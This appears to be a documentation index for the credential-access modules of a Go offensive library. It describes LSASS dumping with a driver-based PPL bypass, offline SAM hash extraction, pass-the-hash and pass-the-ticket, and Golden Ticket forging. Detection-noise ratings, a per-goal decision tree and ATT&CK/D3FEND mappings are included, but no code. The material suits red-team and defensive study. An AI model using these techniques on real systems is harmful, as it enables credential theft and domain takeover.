Credential access

← maldev README · docs/index

Pure-Go credential-extraction primitives for Windows: live LSASS process dumping, offline SAM hive parsing, in-process MINIDUMP parsing, and Kerberos ticket forging. The four packages chain end-to-end — lsassdump produces a dump, sekurlsa parses it into typed credentials, goldenticket re-uses an extracted krbtgt hash to mint a Golden TGT, and samdump covers the local-account branch when LSASS access is unavailable.

flowchart LR
    subgraph host [Live Windows host]
        L[lsass.exe<br>memory]
        S[SYSTEM + SAM<br>hives]
        K[krbtgt key<br>on a DC]
    end
    subgraph extract [credentials/*]
        LD[lsassdump<br>NtReadVirtualMemory<br>+ in-process MINIDUMP<br>+ optional PPL bypass]
        SE[sekurlsa<br>parse MINIDUMP<br>walk MSV / Wdigest /<br>Kerberos / DPAPI / TSPkg /<br>CloudAP / LiveSSP / CredMan]
        SD[samdump<br>REGF parser<br>+ syskey / hashed bootkey<br>+ AES/RC4/DES decrypt]
    end
    subgraph forge [credentials/*]
        GT[goldenticket<br>Forge + Submit]
    end
    L --> LD
    LD --> SE
    S --> SD
    K --> SE
    SE -.krbtgt hash.-> GT
    SD --> OUT[NTLM hashes / pwdump]
    SE --> OUT2[NTLM / Kerberos / DPAPI<br>/ CloudAP PRT / etc.]
    GT --> KIRBI[kirbi blob<br>+ LSA cache inject]

Packages

PackageTech pageDetectionOne-liner
credentials/lsassdumplsassdump.mdnoisyNtGetNextProcess + in-process MINIDUMP + EPROCESS PPL unprotect via RTCore64
credentials/sekurlsasekurlsa.mdquiet (parser only)Pure-Go MSV1_0 / Wdigest / Kerberos / DPAPI / TSPkg / CloudAP / LiveSSP / CredMan walkers + LSA-crypto unwrap + PTH write-back + Kerberos kirbi export
credentials/samdumpsamdump.mdquiet (offline) / noisy (LiveDump)Offline SAM hive dump — REGF parser + boot-key permutation + AES/RC4 hashed-bootkey + per-RID DES de-permutation
credentials/goldenticketgoldenticket.mdnoisy (visible TGT lifetime)PAC marshaling + KRB5 Forge + LSA Submit for Golden Ticket attacks

Quick decision tree

You want to…Use
…get NTLM hashes / Kerberos tickets from a live hostlsassdumpsekurlsa.Parse chain
…parse a .dmp you obtained out-of-bandsekurlsa.Parse
…dump SAM offline (no LSASS access)samdump.Dump
…acquire SAM/SYSTEM live (loud)samdump.LiveDump
…forge a Golden Ticketgoldenticket.ForgeSubmit
…pass-the-hash into a live LSASSsekurlsa.Pass / PassImpersonate
…pass-the-ticketsekurlsa.KerberosTicket.ToKirbigoldenticket.Submit
…bypass PPL on lsass.exelsassdump.Unprotect + kernel/driver/rtcore64

MITRE ATT&CK

T-IDNamePackagesD3FEND counter
T1003.001OS Credential Dumping: LSASS Memorycredentials/lsassdump, credentials/sekurlsaD3-PSA, D3-SICA
T1003.002OS Credential Dumping: SAMcredentials/samdumpD3-PSA, D3-FCA
T1068Exploitation for Privilege Escalationcredentials/lsassdump (PPL bypass via BYOVD)D3-SICA
T1550.002Use Alternate Authentication Material: Pass the Hashcredentials/sekurlsaD3-PSA, D3-SICA
T1550.003Use Alternate Authentication Material: Pass the Ticketcredentials/sekurlsa, credentials/goldenticketD3-NTA
T1558.001Steal or Forge Kerberos Tickets: Golden Ticketcredentials/goldenticketD3-AZET, D3-NTA
T1558.003Steal or Forge Kerberos Tickets: Kerberoastingcredentials/sekurlsa (downstream consumer)D3-NTA

See also